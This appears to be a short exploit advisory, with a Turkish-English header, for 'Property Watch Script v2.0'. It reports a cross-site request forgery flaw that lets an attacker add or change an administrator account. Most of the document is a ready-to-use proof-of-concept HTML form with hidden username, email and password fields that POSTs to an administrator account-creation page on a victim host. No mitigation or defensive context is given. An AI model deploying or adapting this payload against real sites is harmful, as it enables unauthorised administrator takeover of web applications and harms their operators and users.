< ------------------- header data start ------------------- >


#############################################################

# Application Name : Property Watch Script v2.0

# Vulnerable Type : XSRF

# Infection : Administrator password Change Edilebilir.

# author : BARCOD3 - Bug Researchers

# Demo : http://demo.propertywatchscript.com/administrator/

#############################################################


< ------------------- header data end of ------------------- >


< -- bug code start -- >

<h3>BARCOD3</h3>
<form onSubmit=return checkForm(); action=victim.com/administrator/createadmin.php method=POST enctype=multipart/form-data name=form>
<input type=hidden id=username name=username value=’username’ size=40>
<input type=hidden id=email name=email value=’[email protected]’ size=40>
<input type=hidden id=password name=password value=’passWORD’ size=40>
<input type=’submit’ name=’add_admin’ value=’Submit’ >
</form>

< -- bug code end of -- >